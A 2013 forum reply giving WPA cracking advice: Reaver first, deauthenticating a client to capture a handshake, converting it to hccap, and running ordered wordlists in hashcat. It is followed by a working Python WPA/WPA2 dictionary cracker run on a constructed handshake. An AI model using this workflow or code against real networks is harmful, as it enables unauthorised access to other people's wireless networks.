06-01-2013, 10:15 PM
(06-01-2013, 12:17 PM)lukeman3000 Wrote: Hi -
Hello -
(06-01-2013, 12:17 PM)lukeman3000 Wrote: I have some questions regarding cracking in general:
I have some answers regarding cracking in general, but your questions all seem to be about WPA, so I'll give you answers regarding WPA cracking instead.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 1. Does it make more sense to use several smaller dictionary files, or one or two large ones? Why? For example, using a single, gigantic dictionary list means that you would probably spend a lot of time in each letter. Is a linear approach (going from start to finish) statistically better or worse than it being randomized?
Gigantic dictionaries never make sense. Using several smaller, probabilistically-ordered wordlists is always the way to go. Randomized never makes sense, you want to try the most likely candidates first and taper off.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 2. In other words, do dictionary lists go from start to finish, in the same order, each and every time, or can the words that are read from the dictionary file be randomized? What makes the most sense?
The dictionaries go from start to finish in (roughly) the same order every time.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 3. The way I understand WPA cracking is that one starts with Reaver. If unsuccessful, one should try a dictionary attack. And as a matter of last resort, a brute force attack. Is this correct?
Pretty much, except brute forcing WPA does not make any sense unless the key is all digits. And even then you better have an idea of what the key is.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 4. Regarding dictionary attacks, there seem to be so many options available. Hashcat, Pyrit, coWPAtty, rainbow tables, dictionary files, etc..
Just use hashcat.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: I have spent several hours trying to figure out what is (currently) the best option, and it's still not clear to me. In terms of a dictionary attack, Hashcat using regular dictionary files seems to be my best bet. Seeing as how Hashcat is GPU-accelerated and I have a GTX-690 (only one), this option seems to make sense for me. Am I wrong?
No, you are not wrong.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 5. Which version of Hashcat should I get?
All of them.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 6. Finally, my understanding of the process of Hashcat is to obtain a handshake by de-authenticating a client (I can inject), taking that file and converting it here using the online tool (why is that hosted online and not a part of Hashcat itself? - just curious), and finally, to run Hashcat with my selected Dictionary files.
You don't have to use the online tool, you can download cap2hccap. The download link is provided on the page where you upload your cap. Otherwise, this is correct.
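For anyone following the thread who wants to see what the pipeline above (capture -> hccap -> wordlist run) actually computes per candidate, here is an added worked example. It is not code from this thread or from the hashcat project: it builds a synthetic WPA2 handshake for a made-up network, packs it in the 392-byte hccap layout the converter produces (essid[36], AP mac[6], client mac[6], SNonce[32], ANonce[32], eapol[256], eapol_size, keyver, keymic[16]; the PTK derivation uses min/max of the MACs and nonces, so which side is stored first does not change the result), then runs the same PMK -> PTK -> KCK -> MIC check a dictionary attack performs. All MACs, nonces, the ESSID and the passphrase are constructed values, and the EAPOL frame is a minimal message 2 with the MIC field zeroed, not a real capture.

```python
"""Added example: what a WPA/WPA2 dictionary attack against a .hccap computes.
Synthetic handshake with constructed values; not the thread's or hashcat's code."""
import hashlib
import hmac
import struct

# hccap layout (392 bytes): essid[36], mac1 (AP)[6], mac2 (STA)[6], nonce1 (SNonce)[32],
# nonce2 (ANonce)[32], eapol[256], int eapol_size, int keyver, keymic[16]. Ints as written on x86 (LE).
HCCAP = struct.Struct("<36s6s6s32s32s256sii16s")
# CCMP/PSK RSN information element as a client carries it in handshake message 2.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def pmk(passphrase: str, essid: bytes) -> bytes:
    # 802.11i PSK derivation: 4096 rounds of PBKDF2-HMAC-SHA1 salted with the ESSID.
    # This call is where nearly all of the cracking time goes, so candidate ordering
    # matters far more than wordlist size.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def ptk(pmk_: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512: HMAC-SHA1 over "Pairwise key expansion" || min/max(MACs) || min/max(nonces) || i.
    # Because of the min/max, it does not matter which side's values are called mac1/nonce1.
    label = b"Pairwise key expansion"
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk_, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]            # KCK is the first 16 bytes of this


def eapol_mic(kck: bytes, eapol_zeroed: bytes, keyver: int) -> bytes:
    # keyver 1 (WPA/TKIP): HMAC-MD5; keyver 2 (WPA2/CCMP): HMAC-SHA1, both truncated to 128 bits.
    digest = hashlib.md5 if keyver == 1 else hashlib.sha1
    return hmac.new(kck, eapol_zeroed, digest).digest()[:16]


def build_eapol_msg2(snonce: bytes, keyver: int) -> bytes:
    # Minimal 4-way-handshake message 2 (STA -> AP) with the 16-byte Key MIC field (offset 81)
    # left zero, which is also how the eapol field is stored in the hccap.
    key_info = 0x0108 | keyver      # Pairwise | MIC | key descriptor version
    body = struct.pack(">BHHQ32s16s8s8s16sH", 2, key_info, 0, 1, snonce,
                       b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, b"\x00" * 16, len(RSN_IE)) + RSN_IE
    return struct.pack(">BBH", 2, 3, len(body)) + body   # 802.1X header: version 2, EAPOL-Key


def parse_hccap(blob: bytes) -> dict:
    essid, mac1, mac2, nonce1, nonce2, eapol, eapol_size, keyver, keymic = HCCAP.unpack(blob)
    # hccap stores no ESSID length; the field is NUL padded.
    return dict(essid=essid.rstrip(b"\x00"), ap_mac=mac1, sta_mac=mac2, snonce=nonce1,
                anonce=nonce2, eapol=eapol[:eapol_size], keyver=keyver, keymic=keymic)


def dictionary_attack(hccap: bytes, wordlist):
    # The per-candidate check a WPA dictionary attack performs: PMK -> PTK -> KCK -> MIC compare.
    h = parse_hccap(hccap)
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:    # WPA-PSK passphrases are 8..63 characters; skip the rest
            continue
        kck = ptk(pmk(cand, h["essid"]), h["ap_mac"], h["sta_mac"], h["anonce"], h["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, h["eapol"], h["keyver"]), h["keymic"]):
            return cand
    return None


# ---- constructed handshake (fixed, made-up values so the run is reproducible) ----
ESSID = b"hashcat-test"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(0x10, 0x30))
SNONCE = bytes(range(0xa0, 0xc0))
KEYVER = 2
PASSPHRASE = "correct horse battery"


def build_sample_hccap(passphrase: str = PASSPHRASE, keyver: int = KEYVER) -> bytes:
    # Play the supplicant: derive the real KCK, sign message 2, then pack the fields the way
    # a cap-to-hccap converter would. Only the passphrase is secret; everything else is on the air.
    eapol = build_eapol_msg2(SNONCE, keyver)
    kck = ptk(pmk(passphrase, ESSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, eapol, keyver)
    return HCCAP.pack(ESSID, AP_MAC, STA_MAC, SNONCE, ANONCE, eapol, len(eapol), keyver, mic)


if __name__ == "__main__":
    cap = build_sample_hccap()
    words = ["password", "12345678", "correct horse battery", "letmein123"]
    print(len(cap), "bytes; recovered:", dictionary_attack(cap, words))
```

Every candidate costs one full 4096-round PBKDF2 regardless of how wrong it is, which is the concrete reason behind the advice above to feed the most likely candidates first and to stop thinking of "gigantic" lists as an advantage.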